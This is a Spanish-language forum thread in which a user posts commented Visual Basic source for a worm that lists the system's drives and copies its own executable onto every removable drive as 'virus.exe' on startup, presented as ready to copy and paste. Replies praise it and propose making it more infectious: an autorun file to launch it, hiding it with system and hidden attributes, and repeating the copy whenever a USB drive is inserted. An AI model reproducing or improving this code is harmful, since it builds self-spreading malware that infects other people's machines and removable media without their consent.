Este sencillo código permite enumerar todas las unidades del sistema, descubrir de que tipo son (fijas, extraibles, CD, remotas, etc...) y copiar el virus en su interior.
Private Declare Function GetLogicalDrives Lib "kernel32" () As Long
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long
Const DRIVE_REMOVABLE = 2
Const DRIVE_FIXED = 3
Const DRIVE_REMOTE = 4
Const DRIVE_CDROM = 5
Const DRIVE_RAMDISK = 6
'Función para enumerar todas las unidades (sean del tipo que sean)
Function EnumDrives() As String
Dim i As Long
Dim tmp As Long
Dim drives As String
tmp = GetLogicalDrives()
If tmp Then
For i = 0 To 25
If (tmp And 2 ^ i) <> 0 Then
drives = drives & Chr$(i + 65) & ":#"
End If
Next
End If
EnumDrives = drives
'La variable drives almacena todas
'las unidades en formato "A:#C:#D:#E:#"
End Function
Function GetType(ByVal drives As String)
Dim tmp() As String
'Separamos las unidades según el caracter #
tmp = Split(drives, "#")
For i = 0 To UBound(tmp) - 1
If GetDriveType(tmp(i)) = DRIVE_REMOVABLE Then
'Llamamos a la función de infectar la unidad
'si es del tipo DRIVE_REMOVABLE
Call InfectDrive("virus.exe", tmp(i))
End If
Next
End Function
Function InfectDrive(ByVal FileName As String, ByVal drive As String) As Boolean
'Importante, no siempre tenemos acceso de escritura
'en las unidades, sin esta linea podríamos "matar"
'nuestro virus :(
On Error Resume Next
Dim MySelf As String
MySelf = String$(255, Chr$(0))
'Obtenemos nuestra propia ruta
GetModuleFileName 0, MySelf, Len(MySelf)
'Nos copiamos en la unidad con el nombre de "virus.exe"
FileCopy MySelf, drive & "\" & FileName
End Function
Private Sub Form_Load()
'Empieza la juerga!
Call GetType(EnumDrives)
End Sub
El código está comentado y no tiene mucha complicación, copiar y pegar en un proyecto nuevo y os funcionará.
Decirme si os gusta, si se puede mejorar algo, añadir funciones, etc...
Saludos!! vuestro amigo ||MadAntrax||
muy guapo tio como siempre;D
Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo) ;)
Cita de: E0N en 3 Abril 2007, 00:05 AM
Joe ultimamente estas q regalas los codigos xDD gracias (de nuevo)
Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien
Saludos!!
Se me ocurre una mejora: Hacer que el código cree el archivo autorun.ini con el path apuntando al virus, de esta forma consigues que nuestro EXE se ejecute al hacer doble click en las unidades de red, solo me falta saber si tambien afecta en los otros tipos de unidad.
Proponer algo :P
Cita de: ||MadAntrax|| en 3 Abril 2007, 00:08 AM
Digamos que tengo una época generosa... tengo más códigos para regalar pero los publicaré poquito a poco, tantos de golpe no se asimilan bien
Saludos!!
Joer pues a seguir publicando codigos,que son muy interesantes y de gran ayuda.Espero con ansias tu siguiente aporte ;).
Saludos y gracias.
Si Despues de crear el autorun.inf usas shell y lo pones en vbhide y le pones attrib +s +h +r lo pones como archivo oculto yd e sistema aunke vea los ocultos no c ve jejeje
Salu2
podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??
a mi me parece buena idea
Cita de: Meg en 3 Abril 2007, 22:33 PM
podrias poner un post con todos tus codigos,en ese post se blokea y se le pone chincheta,yo creo k seria lo mejor para tener recopilados todos tus codigos ya que son buenos y utiles... solo es una idea xD que os parece??
Ummm, no creo que merezca un trato especial para mi sources, prefiero ir abriendo un post para cada source, asi lo podemos comentar y mejorar, si los pongo todos en uno se juntarán todas las dudas/sujerencias/mejoras y será un lío...
Gracias igualmente
Si kieres ponerlos en kizar.net yo me encargo de q tenga chincheta, una recopilacion asi siempre es util ;)
orale viendo tu codigo podre estudiar mas los metodos de infeccion para hacer cada ves mejor el Mx One
por ciertyo mad esta chida la progressbar que venia con el cactus joiner
Muy lindo, te felicito...
oie Mad... supongo que tienes escondigo un virus muy inteligente y con funciones muy avanzadas...
... un pregunta:
lo q qiero es hacer que repita la funcion cada ves que detecta un dispositivo nuevo (osea cuanado se inserta un pendrive o usb) para que en ese momento se copie x si solo.
es mi pregunta.
..........
buen aporte.